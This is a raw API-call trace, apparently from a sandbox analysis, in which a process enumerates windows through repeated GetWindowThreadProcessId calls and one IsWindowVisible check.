	[0931.882] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1624
	[0931.882] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b9c
	[0931.882] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16f4
	[0931.882] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x145c
	[0931.883] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x17d0
	[0931.883] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1d28
	[0931.883] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xcb8
	[0931.883] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1190
	[0931.883] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x3a8
	[0931.883] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1bd0
	[0931.883] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1bfc
	[0931.883] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1a78
	[0931.884] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b90
	[0931.884] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b04
	[0931.884] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b34
	[0931.884] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b64
	[0931.884] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1bb0
	[0931.884] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1acc
	[0931.884] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1a2c
	[0931.884] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x19a8
	[0931.885] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1944
	[0931.885] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x18c8
	[0931.885] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x18ac
	[0931.885] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x18ec
	[0931.885] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1898
	[0931.885] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc98
	[0931.886] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x153c
	[0931.886] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1808
	[0931.886] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x12a4
	[0931.886] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1740
	[0931.886] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16c4
	[0931.886] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1820
	[0931.886] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16ac
	[0931.886] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1858
	[0931.887] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1664
	[0931.887] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10b4
	[0931.887] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10ac
	[0931.887] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10ec
	[0931.887] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1068
	[0931.887] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x17e0
	[0931.887] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x102c
	[0931.887] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x17a4
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1050
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1694
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1770
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1720
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x165c
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1578
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x16c0
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x161c
	[0931.888] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1638
	[0931.889] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x15c8
	[0931.889] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1554
	[0931.889] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1674
	[0931.889] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1520
	[0931.889] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x14bc
	[0931.889] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xf8c
	[0931.889] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe9c
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1434
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x14ec
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xfcc
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x12ac
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1484
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x934
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc0c
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xb08
	[0931.890] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x948
	[0931.891] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1178
	[0931.891] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x13e0
	[0931.891] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xcd0
	[0931.891] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x13fc
	[0931.891] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xdc8
	[0931.891] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc18
	[0931.892] GetWindow (hWnd=0x105b6, uCmd=0x4) returned 0x0
	[0931.893] IsWindowVisible (hWnd=0x105b6) returned 0
	[0931.893] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc2c
	[0931.893] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa1c
	[0931.893] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1244
	[0931.893] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xdb0
	[0931.894] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1398
	[0931.894] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1358
	[0931.894] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1370
	[0931.894] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1340
	[0931.894] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x130c
	[0931.894] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x12c0
	[0931.894] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x12e4
	[0931.894] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1270
	[0931.895] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1298
	[0931.895] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x120c
	[0931.895] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x122c
	[0931.895] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x11c4
	[0931.895] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x11b0
	[0931.895] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1188
	[0931.895] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1148
	[0931.895] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1160
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10fc
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe34
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xea4
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x514
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe48
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xbc8
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xdf8
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x318
	[0931.896] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xcac
	[0931.897] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x8bc
	[0931.897] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xf9c
	[0931.897] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xf48
	[0931.897] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe40
	[0931.897] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xecc
	[0931.897] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xeb8
	[0931.897] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe80
	[0931.897] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe98
	[0931.898] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe60
	[0931.898] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xee4
	[0931.898] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xf00
	[0931.898] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xdf0
	[0931.898] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xe1c
	[0931.898] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xdd0
	[0931.898] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xd94
	[0931.898] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xd74
	[0931.899] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xd00
	[0931.899] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xcd8
	[0931.899] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc84
	[0931.899] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xca4
	[0931.899] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc64
	[0931.899] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xc24
	[0931.899] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xb84
	[0931.899] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xbac
	[0931.900] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x384
	[0931.900] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xab8
	[0931.900] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x33c
	[0931.900] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa44
	[0932.992] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa64
	[0932.992] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x8a8
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xaf0
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x88c
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xb04
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x910
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x230
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xac0
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xab4
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xaac
	[0932.993] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x3d0
	[0932.994] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x978
	[0932.994] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa7c
	[0932.994] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x59c
	[0932.994] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa88
	[0932.994] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa6c
	[0932.994] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa68
	[0932.994] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x9f8
	[0932.994] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xa04
	[0932.995] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x924
	[0932.995] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x8dc
	[0932.995] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x7dc
	[0932.995] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x768
	[0932.995] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x764
	[0932.995] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x820
	[0932.995] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x810
	[0932.995] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x794
	[0932.996] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x83c
	[0932.996] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x7ac
	[0932.996] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xb44
	[0932.996] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x6bc
	[0932.996] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xb5c
	[0932.996] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x838
	[0932.996] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0932.996] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x818
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x5b8
	[0932.997] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x494
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ec
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x440
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x7e8
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x730
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2c8
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x31c
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x330
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x128
	[0932.998] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x5c8
	[0932.999] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x6f8
	[0932.999] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x358
	[0932.999] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x73c
	[0932.999] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0xb0
	[0932.999] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x250
	[0933.000] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x240
	[0933.000] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x790
	[0933.000] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x61c
